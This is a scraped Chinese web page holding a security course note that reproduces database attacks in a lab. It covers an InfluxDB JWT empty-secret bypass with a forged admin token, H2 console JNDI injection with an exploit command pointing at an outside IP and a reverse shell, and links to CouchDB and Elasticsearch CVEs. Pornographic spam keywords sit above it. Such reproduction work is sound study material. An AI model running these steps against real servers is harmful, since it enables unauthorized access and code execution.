国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

小迪安全 第56天 服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb 復(fù)現(xiàn)

這篇具有很好參考價值的文章主要介紹了小迪安全 第56天 服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb 復(fù)現(xiàn)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

如何判斷數(shù)據(jù)庫:

1.端口掃描

2.報錯回顯

一.Influxdb-未授權(quán)訪問-Jwt 驗證不當(dāng)

1.什么是時序數(shù)據(jù)庫?

時序數(shù)據(jù)庫是近幾年一個新的概念,與傳統(tǒng)的Mysql關(guān)系型數(shù)據(jù)庫相比,它的最大的特點是:數(shù)據(jù)按照時間順序存儲。

舉例來說,日志數(shù)據(jù),是以時間順序存儲的,所以用時序數(shù)據(jù)庫存儲是一種很好的選擇。使用Mysql在存儲的過程中,不是對這種基于時間的數(shù)據(jù)進行優(yōu)化的,所以,在查詢、插入上有一些瓶頸。

默認端口:

Web 操作界面默認運行在 localhost 8083 端口;
HTTP API 接口默認運行在 localhost 8086 端口

參考鏈接:https://blog.csdn.net/weixin_46560589/article/details/126002393

2.未授權(quán)訪問

Influxdb使用 jwt 作為鑒權(quán)方式。在用戶開啟了認證, 但未設(shè)置參數(shù) shared-secret 的情況下,jwt 的認證密鑰為空字符串,此時攻擊者可 以偽造任意用戶身份在 influxdb 中執(zhí)行 SQL 語句。

影響版本:InfluxDB < 1.7.6

訪問http://xxx:8086/debug/vars? ? ? 可查看系統(tǒng)服務(wù)信息

kibana

訪問http://xxx:8086/query? ? ? ?

并以POST請求db=sample&q=show users? ? ?會提示需要登錄:

kibana

直接登錄會報錯

其中,adnin 是一個已經(jīng)存在的用戶, exp 是一個時間截,代表著這個token的過期時間,你需要設(shè)置為一個未來的時間戳,設(shè)置一個空密匙進行加密。

kibana

通過抓包/query?添加數(shù)據(jù)

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A

kibana

kibana

二.H2 database-未授權(quán)訪問-配置不當(dāng)

默認端口:20051

H2 database 是一款 Java 內(nèi)存數(shù)據(jù)庫,多用于單元測試。H2 database 自帶一個 Web 管理頁面,在 Spirng 開發(fā)中,如果我們設(shè)置如下選項,即可允許外部用戶訪問 Web 管理頁面,且沒有鑒權(quán):

spring.h2.console.enabled=true

spring.h2.console.settings.web-allow-others=true

1.下載EXP:? JNDI-Injection-Exploit——https://github.com/welk1n/JNDI-Injection-Exploit.git

2.執(zhí)行命令: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 49.232.65.159

3.攻擊端開啟監(jiān)聽

4.
javax.naming.InitialContext
kibana

5.成功反彈shell

三.CouchDB-權(quán)限繞過配合 RCE-漏洞

感覺用的少

參考下面兩個cve

vulhub/couchdb/CVE-2017-12635/README.zh-cn.md at master · vulhub/vulhub (github.com)

vulhub/couchdb/CVE-2017-12636/README.zh-cn.md 在 master ·vulhub/vulhub (github.com)

四.ElasticSearch-文件寫入&RCE-漏洞

Elasticsearch 是一個分布式、免費和開放的搜索和分析引擎,適用于所有類型的數(shù)據(jù),包括文本、數(shù)字、地理空間、結(jié)構(gòu)化和非結(jié)構(gòu)化數(shù)據(jù)。

迪總說經(jīng)常和Kibana用于藍隊的日志分析和數(shù)據(jù)分析

默認端口:9200? ?9300

直接看下面這個鏈接比較全(偷懶)

ElasticSearch漏洞復(fù)現(xiàn)_elastic漏洞-CSDN博客文章來源地址http://www.zghlxwxcb.cn/news/detail-770288.html

到了這里,關(guān)于小迪安全 第56天 服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb 復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)

    知識點: 1、服務(wù)攻防數(shù)據(jù)庫類型安全 2、RedisHadoopMysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不當(dāng)未授權(quán)三重奏RCE漏洞 3、Redis-配置不當(dāng)未授權(quán)三重奏RCE兩漏洞 #章節(jié)內(nèi)容: 常見服務(wù)應(yīng)用的安全測試: 1、配置不當(dāng)-未授權(quán)訪問 2、安全機制特定安全漏洞 3、安全機制弱口令爆

    2024年01月23日
    瀏覽(29)
  • 數(shù)據(jù)庫安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞復(fù)現(xiàn)

    數(shù)據(jù)庫安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞復(fù)現(xiàn)

    參考:influxdb CVE-2019-20933 靶場環(huán)境:vulhub 打開靶場進入環(huán)境: 訪問: 端口掃描: 默認端口: 8086:用于客戶端和服務(wù)端交互的HTTP API 8088 :用于提供備份和恢復(fù)的RPC服務(wù) influxdb 是一款著名的時序數(shù)據(jù)庫,其使用 jwt 作為鑒權(quán)方式。在用戶開啟了認證, 但未設(shè)置參數(shù) shared-s

    2024年02月06日
    瀏覽(24)
  • 小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    IIS現(xiàn)在用的也少了,漏洞也基本沒啥用 ?沒有和權(quán)限掛鉤 windows 2003上面的漏洞 配置不當(dāng):該漏洞與 Nginx、php 版本無關(guān),屬于用戶配置不當(dāng)造成的解析漏洞。 這個跟文件上傳類似,找到文件上傳點,上傳png圖片 找到上傳路徑和nginx版本號 查看路徑 添加后綴可以用php執(zhí)行png

    2024年02月04日
    瀏覽(26)
  • 小迪安全47WEB 攻防-通用漏洞&Java 反序列化&EXP 生成&數(shù)據(jù)提取&組件安全

    小迪安全47WEB 攻防-通用漏洞&Java 反序列化&EXP 生成&數(shù)據(jù)提取&組件安全

    # 知識點: 1 、 Java 反序列化演示 - 原生 API 接口 2 、 Java 反序列化漏洞利用 -Ysoserial 使用 3 、 Java 反序列化漏洞發(fā)現(xiàn)利用點 - 函數(shù) 數(shù)據(jù) 4 、 Java 反序列化考點 - 真實 CTF 賽題 - 審計分析 # 內(nèi)容點: 1 、明白 -Java 反序列化原理 2 、判斷 -Java 反序列化漏洞 3 、學(xué)會 -Ysoserial 工具

    2024年04月10日
    瀏覽(59)
  • SpringBoot整合H2數(shù)據(jù)庫

    SpringBoot整合H2數(shù)據(jù)庫

    H2官網(wǎng):http://www.h2database.com/ H2是一個Java語言編寫的嵌入式數(shù)據(jù)庫,它不受平臺的限制,同時H2提供了一個十分方便的web控制臺,用于操作和管理數(shù)據(jù)庫內(nèi)容。H2還提供兼容模式,可以兼容一些主流的數(shù)據(jù)庫,也可以為緩存數(shù)據(jù)庫使用,它具有比較完備的數(shù)據(jù)庫特性,如支cli

    2024年02月16日
    瀏覽(24)
  • 小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    # 知識點: 1 、中間件安全問題 2 、中間件文件上傳解析 3 、 Web 應(yīng)用編輯器上傳 編輯器也就是第三方插件,一般都是文件上傳漏洞 # 詳細點: 1 、檢測層面:前端,后端等 2 、檢測內(nèi)容:文件頭,完整性,二次渲染等 3 、檢測后綴:黑名單,白名單, MIME 檢測等 4 、繞過技

    2024年03月16日
    瀏覽(32)
  • java單元測試(二)H2數(shù)據(jù)庫篇

    java單元測試(二)H2數(shù)據(jù)庫篇

    H2 數(shù)據(jù)庫是一個用 Java 開發(fā)的嵌入式(內(nèi)存級別)數(shù)據(jù)庫,它本身只是一個類庫,也就是只有一個 jar 文件,可以直接嵌入到項目中。 H2數(shù)據(jù)庫又被稱為內(nèi)存數(shù)據(jù)庫,因為它支持在內(nèi)存中創(chuàng)建數(shù)據(jù)庫。 為什么測試數(shù)據(jù)庫CRUD 對于Spring項目,特別是測試Service層或者dao層的代碼時。需要驗

    2024年02月06日
    瀏覽(26)
  • Springboot集成輕量級內(nèi)存數(shù)據(jù)庫H2

    最近做一個小項目,需要存儲的數(shù)據(jù)不多,用mysql太重了,用其他的Redis之類的也不太方便,然后就想到了H2,他就是一個jar包,可以和項目一起打包發(fā)布,非常適合數(shù)據(jù)量不多的微小系統(tǒng),下面大概介紹下H2的基本知識和Springboot的集成 H2是一個用Java開發(fā)的嵌入式數(shù)據(jù)庫,它本

    2024年02月07日
    瀏覽(17)
  • 從零開始:安裝H2數(shù)據(jù)庫的步驟解析

    從零開始:安裝H2數(shù)據(jù)庫的步驟解析

    在開發(fā)或編寫示例時,有時需要用到數(shù)據(jù)庫,如果本機上剛好沒有安裝,類似有些同學(xué)是臨時借用的電腦或?qū)W校的電腦剛好沒有安裝時,我們可以使用H2數(shù)據(jù)庫來快速代替,即方便又靈活。 步驟 1:下載H2數(shù)據(jù)庫 訪問H2數(shù)據(jù)庫的官方網(wǎng)站(https://www.h2database.com/),并下載最新的

    2024年02月08日
    瀏覽(24)
  • 小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL

    小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL

    ? ?#知識點:? 1、SQL 注入-MYSQL 數(shù)據(jù)庫? 2、SQL 注入-MSSQL(SQL server) 數(shù)據(jù)庫? 3、SQL 注入-PostgreSQL 數(shù)據(jù)庫? #詳細點:? Access 無高權(quán)限注入點-只能猜解,還是暴力猜解? ? ? ? ? ?因為access的數(shù)據(jù)庫是獨立存在的,不存在統(tǒng)一管理 對賬號密碼進行猜解,此時只是獲取到后臺的操

    2024年02月20日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包